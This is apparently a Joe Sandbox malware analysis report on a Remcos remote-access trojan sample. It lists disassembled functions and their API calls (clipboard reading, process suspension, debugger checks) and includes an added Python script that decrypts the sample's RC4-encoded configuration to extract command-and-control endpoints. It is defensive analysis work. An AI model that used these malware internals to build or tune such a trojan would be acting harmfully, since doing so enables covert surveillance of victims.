                                              • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                              • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                              • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                              • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
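The FindResourceA(SETTINGS, RT_RCDATA) / LoadResource / LockResource / SizeofResource sequence in the function above is how the sample reads its embedded configuration out of the PE resource section; the report's "Found malware configuration" and "C2 URLs / IPs found in malware configuration" verdicts come from decoding that blob. The script below is an added example, not Joe Sandbox output and not the sample's own code. It decodes a blob in the layout that public Remcos analyses describe: byte 0 is the RC4 key length, the key follows, and the rest is the RC4-encrypted configuration, with fields separated by `|\x1e\x1e\x1f|` and the first field holding `host:port:password` C2 entries separated by `\x1e\x1e\x1f`. That layout is an assumption to confirm against this build; the hostnames and key in the constructed sample blob are placeholders, not indicators from the report, and the optional resource dump uses the third-party `pefile` library.

```python
"""
Decode a Remcos-style "SETTINGS" RCDATA blob and list its C2 endpoints.

Added example for the sandbox report; not the sample's code. Layout below is the one
public Remcos analyses describe and is treated as an assumption:
  byte 0        = RC4 key length
  bytes 1..N    = RC4 key
  bytes N+1..   = RC4-encrypted config, fields separated by b"|\x1e\x1e\x1f|"
  field 0       = "host:port:password" entries separated by b"\x1e\x1e\x1f"
"""
from typing import Dict, List, Tuple

FIELD_SEP = b"|\x1e\x1e\x1f|"  # assumed field separator
HOST_SEP = b"\x1e\x1e\x1f"     # assumed separator between C2 entries inside field 0
RT_RCDATA = 10                 # resource type 0xA passed to FindResourceA in the report


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """Split the blob into key-length / key / ciphertext and return the plaintext."""
    if len(blob) < 2:
        raise ValueError("SETTINGS blob too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("SETTINGS blob truncated or key-length byte implausible")
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:])


def parse_config(plaintext: bytes) -> Dict[str, object]:
    """Split the decrypted config into fields and pull (host, port) pairs out of field 0."""
    fields = plaintext.split(FIELD_SEP)
    c2: List[Tuple[str, int]] = []
    for entry in fields[0].split(HOST_SEP):
        parts = entry.split(b":")
        if len(parts) >= 2 and parts[1].isdigit():
            c2.append((parts[0].decode("latin-1"), int(parts[1])))
    return {
        "c2": c2,
        "field_count": len(fields),
        "fields": [f.decode("latin-1", "replace") for f in fields],
    }


def extract_settings_resource(pe_path: str) -> bytes:
    """Dump the RT_RCDATA resource named SETTINGS from a PE using pefile (pip install pefile)."""
    import pefile  # imported lazily so the rest of the module runs without it
    pe = pefile.PE(pe_path)
    for type_entry in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        if type_entry.id != RT_RCDATA:
            continue
        for name_entry in type_entry.directory.entries:
            if name_entry.name is None or str(name_entry.name) != "SETTINGS":
                continue
            lang_entry = name_entry.directory.entries[0]
            rva = lang_entry.data.struct.OffsetToData
            size = lang_entry.data.struct.Size
            return pe.get_data(rva, size)
    raise LookupError("no RT_RCDATA resource named SETTINGS")


def build_settings_blob(key: bytes, fields: List[bytes]) -> bytes:
    """Build a blob in the assumed layout; used here only to construct offline test input."""
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP.join(fields))


# Constructed sample input: key, hostnames and ports are placeholders, not indicators from the report.
SAMPLE_BLOB = build_settings_blob(
    b"ExampleRc4Key",
    [b"c2.example.invalid:2404:1" + HOST_SEP + b"198.51.100.7:8080:1",
     b"RemoteHost", b"1", b"remcos"],
)

if __name__ == "__main__":
    import sys
    blob = extract_settings_resource(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_BLOB
    cfg = parse_config(decrypt_settings(blob))
    print(f"{cfg['field_count']} config fields")
    for host, port in cfg["c2"]:
        print(f"C2: {host}:{port}")
```

Run it with the path to the decoded .exe to dump and decode the real resource; with no argument it decodes the constructed blob. If `field_count` comes back as 1, the separator assumption does not hold for this build and the RC4 plaintext should be inspected by hand before trusting any extracted indicator.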
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004096A5
                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              • Opcode ID: 96c6d110fa695d661907fb43dfa402e2085f3c3512803720d38caf79e6a8c285
                                              • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                              • Opcode Fuzzy Hash: 96c6d110fa695d661907fb43dfa402e2085f3c3512803720d38caf79e6a8c285
                                              • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID: v%(/
                                              • API String ID: 2829624132-2435473048
                                              • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                              • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                              • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                              • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID: v%(/
                                              • API String ID: 3906539128-2435473048
                                              • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                              • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                              • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                              • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$v%(/
                                              • API String ID: 0-3712000213
                                              • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                              • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                              • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                              • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID: p'E$JD
                                              • API String ID: 1084509184-908320845
                                              • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                              • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                              • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                              • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx$v%(/
                                              • API String ID: 2299586839-3080525085
                                              • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                              • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                              • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                              • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                              • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                              • ExitProcess.KERNEL32 ref: 0044338F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                              • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                              • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                              • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                              APIs
                                              • OpenClipboard.USER32(00000000), ref: 0040B74C
                                               • GetClipboardData.USER32(0000000D [CF_UNICODETEXT]), ref: 0040B758
                                              • CloseClipboard.USER32 ref: 0040B760
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseDataOpen
                                              • String ID:
                                              • API String ID: 2058664381-0
                                              • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                              • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                              • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                              • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                              APIs
                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                              • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                              • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseHandleOpenResume
                                              • String ID:
                                              • API String ID: 3614150671-0
                                              • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                              • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                              • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                              • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                              APIs
                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                              • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseHandleOpenSuspend
                                              • String ID:
                                              • API String ID: 1999457699-0
                                              • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                              • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                              • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                              • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID: v%(/
                                              • API String ID: 1663032902-2435473048
                                              • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                              • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                              • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                              • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID: JD
                                              • API String ID: 1084509184-2669065882
                                              • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                              • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                              • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                              • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                              APIs
                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID: v%(/
                                              • API String ID: 1272433827-2435473048
                                              • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                              • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                              • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                              • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                              • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                              • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                              • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                              • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                              • Opcode Fuzzy Hash: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                              • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                              • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                              • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                              • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                              • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                              • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                              • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                              • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                              • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                              • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
